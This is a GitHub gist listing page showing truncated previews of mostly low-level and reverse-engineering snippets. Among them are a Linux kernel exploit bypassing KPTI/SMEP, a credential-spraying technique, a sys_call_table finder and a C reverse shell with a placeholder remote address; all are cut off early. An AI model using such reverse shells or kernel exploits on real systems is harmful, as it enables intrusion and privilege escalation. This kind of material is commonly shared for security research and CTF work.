Skip to content

Instantly share code, notes, and snippets.

View n4sm's full-sized avatar
🏳️
Fuzzing

nasm n4sm

🏳️
Fuzzing
View GitHub Profile
@ameetsaahu
ameetsaahu / spray_cred.md
Created November 30, 2022 13:52
Cred spraying techniques

Using capset

// Thanks to @pqlqpql
#include <linux/io_uring.h>
#include <sys/capability.h>
#include <sys/syscall.h>

struct user_cap_data_struct {
    uint32_t effective;
    uint32_t permitted;
@n4sm
n4sm / tiny_parser.rs
Last active February 17, 2024 04:10
A very small elf parser developped in rust (only the executable header for now)
use std::fs::File;
use std::fs::{OpenOptions};
use std::io::{Read};
//use std::mem::{size_of, transmute};
/*
typedef struct
{
unsigned char e_ident[EI_NIDENT]; // Magic number and other info
Elf64_Half e_type; // Object file type
@n4sm
n4sm / exploit.c
Last active August 19, 2021 12:24
Kernel Exploitation - ROP bypass KPTI / smep
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#include <sys/ioctl.h>
@n4sm
n4sm / open_self_linux_nasm.asm
Last active July 25, 2020 20:16
Just an assembly code which opens itself when it is mapped and executed, in nasm (in order to do for example self mofifying code)
; https://github.com/n4sm/AD_1DA/tree/master/AD_1DA
BITS 64
section .text
global _start
_start:
mov r13, 0x1111111111111111
@icecr4ck
icecr4ck / idapython_cheatsheet.md
Last active April 23, 2024 18:45
Cheatsheet for IDAPython
@Spl3en
Spl3en / rol_ror.c
Created February 21, 2017 21:11
rol / ror gcc
inline int rol (int in, int x) {
int res;
__asm__ __volatile__("rol %%eax, %%cl" :"=a"(res) :"a"(in), "c"(x));
return res;
}
inline int ror (int in, int x) {
int res;
__asm__ __volatile__("ror %%eax, %%cl" :"=a"(res) :"a"(in), "c"(x));
@ilg-ul
ilg-ul / license-gpl-c-header.txt
Last active April 10, 2024 14:21
C header with GPL license text.
/*
* This file is part of the XXX distribution (https://github.com/xxxx or http://xxx.github.io).
* Copyright (c) 2015 Liviu Ionescu.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 3.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
@acapola
acapola / aes-ni.c
Created August 31, 2015 14:42
AES128 how-to using GCC and Intel AES-NI
#include <stdint.h> //for int8_t
#include <string.h> //for memcmp
#include <wmmintrin.h> //for intrinsics for AES-NI
//compile using gcc and following arguments: -g;-O0;-Wall;-msse2;-msse;-march=native;-maes
//internal stuff
//macros
#define DO_ENC_BLOCK(m,k) \
do{\
@0xabe-io
0xabe-io / reverse_shell.c
Created January 6, 2015 15:24
Simple C code to create a reverse shell
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define REMOTE_ADDR "XXX.XXX.XXX.XXX"
#define REMOTE_PORT XXX
@Cr4sh
Cr4sh / gist:fe910f0d1b0559efd43d
Created September 3, 2014 19:55
Dynamically finding sys_call_table on Linux x86_64 systems
void **find_sys_call_table(void *kernel_addr, int kernel_size)
{
/*
Check for the system_call_fastpath() signature, hand-written piece of
assembly code from arch/x86/kernel/entry_64.S:
ja badsys
mov rcx, r10
call sys_call_table[rax * 8]
mov [rsp + 20h], rax